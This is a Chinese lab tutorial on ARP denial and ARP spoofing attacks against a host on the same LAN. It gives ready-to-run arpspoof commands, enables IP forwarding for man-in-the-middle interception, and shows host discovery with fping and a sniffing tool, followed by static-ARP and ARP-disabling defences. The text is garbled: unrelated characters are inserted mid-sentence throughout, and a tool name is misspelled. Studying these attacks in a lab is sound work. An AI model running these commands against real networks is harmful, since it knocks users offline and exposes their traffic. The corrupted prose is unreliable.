一缀棍、arp斷網(wǎng)攻擊
arp攻擊是針對(duì)同一局域網(wǎng)內(nèi)的靶機(jī)發(fā)起攻擊熟嫩,使被攻擊的靶機(jī)斷網(wǎng)秦踪,需要知道被攻擊目標(biāo)的地址,網(wǎng)關(guān)掸茅,和本機(jī)網(wǎng)卡椅邓。
1.用命令查詢需要知道的信息
arpspoof -i 網(wǎng)卡 -t 目標(biāo)IP 網(wǎng)關(guān) //arp攻擊
ifconfig //查看目標(biāo)機(jī)ip和網(wǎng)卡(在目標(biāo)機(jī)查看,如果不能進(jìn)入目標(biāo)機(jī)昧狮,則用fping在攻擊機(jī)上查看存活ip)
cat /etc/resolv.conf //查看目標(biāo)機(jī)網(wǎng)關(guān)
fping -asg 192.168.252.0/24 //查看局域網(wǎng)當(dāng)中存活的ip
2.用errercap圖形化工具來查詢靶機(jī)信息
errercap -G
選擇Sniff——Unified sniffing(統(tǒng)一嗅探)(默認(rèn)eth0)——Hosts——Scan for hosts
3.確定靶機(jī)IP和網(wǎng)關(guān)后景馁,可以發(fā)起斷網(wǎng)攻擊。
kali系統(tǒng)發(fā)起攻擊
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2
攻擊前ping百度是正常的逗鸣。
當(dāng)受到攻擊時(shí)合住,ping百度就不通了。說明目標(biāo)機(jī)在受到攻擊時(shí)撒璧,網(wǎng)絡(luò)被迫中斷透葛。
當(dāng)kali放開攻擊時(shí),目標(biāo)機(jī)網(wǎng)絡(luò)連接正常卿樱。
二僚害、arp欺騙攻擊是冒充網(wǎng)關(guān)向靶機(jī)發(fā)送假的arp數(shù)據(jù)包。
echo 1 > /proc/sys/net/ipv4/ip_forward //冒充過程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2 //欺騙攻擊
發(fā)起arp欺騙攻擊時(shí)殿如,被攻擊的靶機(jī)不會(huì)斷網(wǎng)贡珊。
三最爬、防止arp攻擊
一般在網(wǎng)上通訊的時(shí)候網(wǎng)關(guān)的IP和MAC的綁定是放在arp 緩存里面的,假的arp包就會(huì)刷新這個(gè)緩存门岔,導(dǎo)致本該發(fā)送到網(wǎng)關(guān)的數(shù)據(jù)包發(fā)到了欺騙者那里爱致。
1.防止arp攻擊的一種有效方式是靜態(tài)arp。將網(wǎng)關(guān)的ip和MAC進(jìn)行綁定寒随。使攻擊者無法假裝網(wǎng)關(guān)對(duì)靶機(jī)進(jìn)行攻擊糠悯。
vim /etc/ethers
192.168.252.2 00:50:56:e0:7e:06
刷新arp發(fā)現(xiàn)網(wǎng)關(guān)后多了一個(gè)M,表示靜態(tài)網(wǎng)關(guān)
再次嘗試用kali攻擊靶機(jī)妻往,發(fā)現(xiàn)互艾,即使在攻擊中,靶機(jī)也可以照常使用網(wǎng)絡(luò)讯泣。
ps:解除綁定命令
arp -d 192.168.252.2
2.第二種方式是關(guān)閉arp解析功能
ifconfig eth0 -arp //關(guān)閉arp
但是纫普,這樣就不能跟局域網(wǎng)內(nèi)其他用戶進(jìn)行通信了,也就不能使用xshell來連接虛擬機(jī)了好渠。
ifconfig eth0 arp //開啟arp解析功能